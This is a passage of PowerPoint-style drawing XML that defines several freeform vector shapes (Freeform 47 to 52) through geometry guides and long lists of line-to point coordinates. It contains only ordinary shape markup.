                      <a:pt x="221" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10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76" name="Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="685" y="2375"/>
                <a:ext cx="14" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 44"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 44"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 44"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 44"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 44"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 44"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 44"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 44"/>
                  <a:gd name="T25" fmla="*/ 0 h 28"/>
                  <a:gd name="T26" fmla="*/ 0 w 44"/>
                  <a:gd name="T27" fmla="*/ 0 h 28"/>
                  <a:gd name="T28" fmla="*/ 0 w 44"/>
                  <a:gd name="T29" fmla="*/ 0 h 28"/>
                  <a:gd name="T30" fmla="*/ 0 w 44"/>
                  <a:gd name="T31" fmla="*/ 0 h 28"/>
                  <a:gd name="T32" fmla="*/ 0 w 44"/>
                  <a:gd name="T33" fmla="*/ 0 h 28"/>
                  <a:gd name="T34" fmla="*/ 0 w 44"/>
                  <a:gd name="T35" fmla="*/ 0 h 28"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 0 h 28"/>
                  <a:gd name="T38" fmla="*/ 0 w 44"/>
                  <a:gd name="T39" fmla="*/ 0 h 28"/>
                  <a:gd name="T40" fmla="*/ 0 w 44"/>
                  <a:gd name="T41" fmla="*/ 0 h 28"/>
                  <a:gd name="T42" fmla="*/ 0 w 44"/>
                  <a:gd name="T43" fmla="*/ 0 h 28"/>
                  <a:gd name="T44" fmla="*/ 0 w 44"/>
                  <a:gd name="T45" fmla="*/ 0 h 28"/>
                  <a:gd name="T46" fmla="*/ 0 w 44"/>
                  <a:gd name="T47" fmla="*/ 0 h 28"/>
                  <a:gd name="T48" fmla="*/ 0 w 44"/>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28"/>
                  <a:gd name="T77" fmla="*/ 44 w 44"/>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28">
                    <a:moveTo>
                      <a:pt x="1" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="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77" name="Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="731" y="2487"/>
                <a:ext cx="11" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 34"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 34"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 34"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 34"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 34"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 34"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 34"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 34"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 34"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 34"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 34"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 34"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 34"/>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3"/>
                  <a:gd name="T41" fmla="*/ 34 w 34"/>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3">
                    <a:moveTo>
                      <a:pt x="17" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17"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78" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683" y="2485"/>
                <a:ext cx="46" cy="8"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 141"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 141"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 0 w 141"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 0 w 141"/>
                  <a:gd name="T7" fmla="*/ 0 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 141"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 0 w 141"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 0 w 141"/>
                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                  <a:gd name="T14" fmla="*/ 0 w 141"/>
                  <a:gd name="T15" fmla="*/ 0 h 25"/>
                  <a:gd name="T16" fmla="*/ 0 w 141"/>
                  <a:gd name="T17" fmla="*/ 0 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 141"/>
                  <a:gd name="T19" fmla="*/ 0 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 141"/>
                  <a:gd name="T21" fmla="*/ 0 h 25"/>
                  <a:gd name="T22" fmla="*/ 0 w 141"/>
                  <a:gd name="T23" fmla="*/ 0 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 141"/>
                  <a:gd name="T25" fmla="*/ 0 h 25"/>
                  <a:gd name="T26" fmla="*/ 0 w 141"/>
                  <a:gd name="T27" fmla="*/ 0 h 25"/>
                  <a:gd name="T28" fmla="*/ 0 w 141"/>
                  <a:gd name="T29" fmla="*/ 0 h 25"/>
                  <a:gd name="T30" fmla="*/ 0 w 141"/>
                  <a:gd name="T31" fmla="*/ 0 h 25"/>
                  <a:gd name="T32" fmla="*/ 0 w 141"/>
                  <a:gd name="T33" fmla="*/ 0 h 25"/>
                  <a:gd name="T34" fmla="*/ 0 w 141"/>
                  <a:gd name="T35" fmla="*/ 0 h 25"/>
                  <a:gd name="T36" fmla="*/ 0 w 141"/>
                  <a:gd name="T37" fmla="*/ 0 h 25"/>
                  <a:gd name="T38" fmla="*/ 0 w 141"/>
                  <a:gd name="T39" fmla="*/ 0 h 25"/>
                  <a:gd name="T40" fmla="*/ 0 w 141"/>
                  <a:gd name="T41" fmla="*/ 0 h 25"/>
                  <a:gd name="T42" fmla="*/ 0 w 141"/>
                  <a:gd name="T43" fmla="*/ 0 h 25"/>
                  <a:gd name="T44" fmla="*/ 0 w 141"/>
                  <a:gd name="T45" fmla="*/ 0 h 25"/>
                  <a:gd name="T46" fmla="*/ 0 w 141"/>
                  <a:gd name="T47" fmla="*/ 0 h 25"/>
                  <a:gd name="T48" fmla="*/ 0 w 141"/>
                  <a:gd name="T49" fmla="*/ 0 h 25"/>
                  <a:gd name="T50" fmla="*/ 0 w 141"/>
                  <a:gd name="T51" fmla="*/ 0 h 25"/>
                  <a:gd name="T52" fmla="*/ 0 w 141"/>
                  <a:gd name="T53" fmla="*/ 0 h 25"/>
                  <a:gd name="T54" fmla="*/ 0 w 141"/>
                  <a:gd name="T55" fmla="*/ 0 h 25"/>
                  <a:gd name="T56" fmla="*/ 0 w 141"/>
                  <a:gd name="T57" fmla="*/ 0 h 25"/>
                  <a:gd name="T58" fmla="*/ 0 w 141"/>
                  <a:gd name="T59" fmla="*/ 0 h 25"/>
                  <a:gd name="T60" fmla="*/ 0 w 141"/>
                  <a:gd name="T61" fmla="*/ 0 h 25"/>
                  <a:gd name="T62" fmla="*/ 0 w 141"/>
                  <a:gd name="T63" fmla="*/ 0 h 25"/>
                  <a:gd name="T64" fmla="*/ 0 w 141"/>
                  <a:gd name="T65" fmla="*/ 0 h 25"/>
                  <a:gd name="T66" fmla="*/ 0 w 141"/>
                  <a:gd name="T67" fmla="*/ 0 h 25"/>
                  <a:gd name="T68" fmla="*/ 0 w 141"/>
                  <a:gd name="T69" fmla="*/ 0 h 25"/>
                  <a:gd name="T70" fmla="*/ 0 w 141"/>
                  <a:gd name="T71" fmla="*/ 0 h 25"/>
                  <a:gd name="T72" fmla="*/ 0 w 141"/>
                  <a:gd name="T73" fmla="*/ 0 h 25"/>
                  <a:gd name="T74" fmla="*/ 0 w 141"/>
                  <a:gd name="T75" fmla="*/ 0 h 25"/>
                  <a:gd name="T76" fmla="*/ 0 w 141"/>
                  <a:gd name="T77" fmla="*/ 0 h 25"/>
                  <a:gd name="T78" fmla="*/ 0 w 141"/>
                  <a:gd name="T79" fmla="*/ 0 h 25"/>
                  <a:gd name="T80" fmla="*/ 0 w 141"/>
                  <a:gd name="T81" fmla="*/ 0 h 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5"/>
                  <a:gd name="T125" fmla="*/ 141 w 141"/>
                  <a:gd name="T126" fmla="*/ 25 h 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5">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="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79" name="Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="642" y="2483"/>
                <a:ext cx="19" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 58"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 0 w 58"/>
                  <a:gd name="T3" fmla="*/ 0 h 32"/>
                  <a:gd name="T4" fmla="*/ 0 w 58"/>
                  <a:gd name="T5" fmla="*/ 0 h 32"/>
                  <a:gd name="T6" fmla="*/ 0 w 58"/>
                  <a:gd name="T7" fmla="*/ 0 h 32"/>
                  <a:gd name="T8" fmla="*/ 0 w 58"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 58"/>
                  <a:gd name="T11" fmla="*/ 0 h 32"/>
                  <a:gd name="T12" fmla="*/ 0 w 58"/>
                  <a:gd name="T13" fmla="*/ 0 h 32"/>
                  <a:gd name="T14" fmla="*/ 0 w 58"/>
                  <a:gd name="T15" fmla="*/ 0 h 32"/>
                  <a:gd name="T16" fmla="*/ 0 w 58"/>
                  <a:gd name="T17" fmla="*/ 0 h 32"/>
                  <a:gd name="T18" fmla="*/ 0 w 58"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 0 w 58"/>
                  <a:gd name="T21" fmla="*/ 0 h 32"/>
                  <a:gd name="T22" fmla="*/ 0 w 58"/>
                  <a:gd name="T23" fmla="*/ 0 h 32"/>
                  <a:gd name="T24" fmla="*/ 0 w 58"/>
                  <a:gd name="T25" fmla="*/ 0 h 32"/>
                  <a:gd name="T26" fmla="*/ 0 w 58"/>
                  <a:gd name="T27" fmla="*/ 0 h 32"/>
                  <a:gd name="T28" fmla="*/ 0 w 58"/>
                  <a:gd name="T29" fmla="*/ 0 h 32"/>
                  <a:gd name="T30" fmla="*/ 0 w 58"/>
                  <a:gd name="T31" fmla="*/ 0 h 32"/>
                  <a:gd name="T32" fmla="*/ 0 w 58"/>
                  <a:gd name="T33" fmla="*/ 0 h 32"/>
                  <a:gd name="T34" fmla="*/ 0 w 58"/>
                  <a:gd name="T35" fmla="*/ 0 h 32"/>
                  <a:gd name="T36" fmla="*/ 0 w 58"/>
                  <a:gd name="T37" fmla="*/ 0 h 32"/>
                  <a:gd name="T38" fmla="*/ 0 w 58"/>
                  <a:gd name="T39" fmla="*/ 0 h 32"/>
                  <a:gd name="T40" fmla="*/ 0 w 58"/>
                  <a:gd name="T41" fmla="*/ 0 h 32"/>
                  <a:gd name="T42" fmla="*/ 0 w 58"/>
                  <a:gd name="T43" fmla="*/ 0 h 32"/>
                  <a:gd name="T44" fmla="*/ 0 w 58"/>
                  <a:gd name="T45" fmla="*/ 0 h 32"/>
                  <a:gd name="T46" fmla="*/ 0 w 58"/>
                  <a:gd name="T47" fmla="*/ 0 h 32"/>
                  <a:gd name="T48" fmla="*/ 0 w 58"/>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32"/>
                  <a:gd name="T77" fmla="*/ 58 w 58"/>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32">
                    <a:moveTo>
                      <a:pt x="3" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1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80" name="Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="620" y="2484"/>
                <a:ext cx="12" cy="14"/>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w 39"/>
                  <a:gd name="T15" fmla="*/ 0 h 41"/>
                  <a:gd name="T16" fmla="*/ 0 w 39"/>
                  <a:gd name="T17" fmla="*/ 0 h 41"/>
                  <a:gd name="T18" fmla="*/ 0 w 39"/>
                  <a:gd name="T19" fmla="*/ 0 h 41"/>
                  <a:gd name="T20" fmla="*/ 0 w 39"/>
                  <a:gd name="T21" fmla="*/ 0 h 41"/>
                  <a:gd name="T22" fmla="*/ 0 w 39"/>
                  <a:gd name="T23" fmla="*/ 0 h 41"/>
                  <a:gd name="T24" fmla="*/ 0 w 39"/>
                  <a:gd name="T25" fmla="*/ 0 h 41"/>
                  <a:gd name="T26" fmla="*/ 0 w 39"/>
                  <a:gd name="T27" fmla="*/ 0 h 41"/>
                  <a:gd name="T28" fmla="*/ 0 w 39"/>
                  <a:gd name="T29" fmla="*/ 0 h 41"/>
                  <a:gd name="T30" fmla="*/ 0 w 39"/>
                  <a:gd name="T31" fmla="*/ 0 h 41"/>
                  <a:gd name="T32" fmla="*/ 0 w 39"/>
                  <a:gd name="T33" fmla="*/ 0 h 41"/>
                  <a:gd name="T34" fmla="*/ 0 w 39"/>
                  <a:gd name="T35" fmla="*/ 0 h 41"/>
                  <a:gd name="T36" fmla="*/ 0 w 39"/>
                  <a:gd name="T37" fmla="*/ 0 h 41"/>
                  <a:gd name="T38" fmla="*/ 0 w 39"/>
                  <a:gd name="T39" fmla="*/ 0 h 41"/>
                  <a:gd name="T40" fmla="*/ 0 w 39"/>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41"/>
                  <a:gd name="T65" fmla="*/ 39 w 3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41">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>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81" name="Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="604" y="2491"/>
                <a:ext cx="39" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 118"/>
                  <a:gd name="T1" fmla="*/ 0 h 83"/>
                  <a:gd name="T2" fmla="*/ 0 w 118"/>
                  <a:gd name="T3" fmla="*/ 0 h 83"/>
                  <a:gd name="T4" fmla="*/ 0 w 118"/>
                  <a:gd name="T5" fmla="*/ 0 h 83"/>
                  <a:gd name="T6" fmla="*/ 0 w 118"/>
                  <a:gd name="T7" fmla="*/ 0 h 83"/>
                  <a:gd name="T8" fmla="*/ 0 w 118"/>
                  <a:gd name="T9" fmla="*/ 0 h 83"/>
                  <a:gd name="T10" fmla="*/ 0 w 118"/>
                  <a:gd name="T11" fmla="*/ 0 h 83"/>
                  <a:gd name="T12" fmla="*/ 0 w 118"/>
                  <a:gd name="T13" fmla="*/ 0 h 83"/>
                  <a:gd name="T14" fmla="*/ 0 w 118"/>
                  <a:gd name="T15" fmla="*/ 0 h 83"/>
                  <a:gd name="T16" fmla="*/ 0 w 118"/>
                  <a:gd name="T17" fmla="*/ 0 h 83"/>
                  <a:gd name="T18" fmla="*/ 0 w 118"/>
                  <a:gd name="T19" fmla="*/ 0 h 83"/>
                  <a:gd name="T20" fmla="*/ 0 w 118"/>
                  <a:gd name="T21" fmla="*/ 0 h 83"/>
                  <a:gd name="T22" fmla="*/ 0 w 118"/>
                  <a:gd name="T23" fmla="*/ 0 h 83"/>
                  <a:gd name="T24" fmla="*/ 0 w 118"/>
                  <a:gd name="T25" fmla="*/ 0 h 83"/>
                  <a:gd name="T26" fmla="*/ 0 w 118"/>
                  <a:gd name="T27" fmla="*/ 0 h 83"/>
                  <a:gd name="T28" fmla="*/ 0 w 118"/>
                  <a:gd name="T29" fmla="*/ 0 h 83"/>
                  <a:gd name="T30" fmla="*/ 0 w 118"/>
                  <a:gd name="T31" fmla="*/ 0 h 83"/>
                  <a:gd name="T32" fmla="*/ 0 w 118"/>
                  <a:gd name="T33" fmla="*/ 0 h 83"/>
                  <a:gd name="T34" fmla="*/ 0 w 118"/>
                  <a:gd name="T35" fmla="*/ 0 h 83"/>
                  <a:gd name="T36" fmla="*/ 0 w 118"/>
                  <a:gd name="T37" fmla="*/ 0 h 83"/>
                  <a:gd name="T38" fmla="*/ 0 w 118"/>
                  <a:gd name="T39" fmla="*/ 0 h 83"/>
                  <a:gd name="T40" fmla="*/ 0 w 118"/>
                  <a:gd name="T41" fmla="*/ 0 h 83"/>
                  <a:gd name="T42" fmla="*/ 0 w 118"/>
                  <a:gd name="T43" fmla="*/ 0 h 83"/>
                  <a:gd name="T44" fmla="*/ 0 w 118"/>
                  <a:gd name="T45" fmla="*/ 0 h 83"/>
                  <a:gd name="T46" fmla="*/ 0 w 118"/>
                  <a:gd name="T47" fmla="*/ 0 h 83"/>
                  <a:gd name="T48" fmla="*/ 0 w 118"/>
                  <a:gd name="T49" fmla="*/ 0 h 83"/>
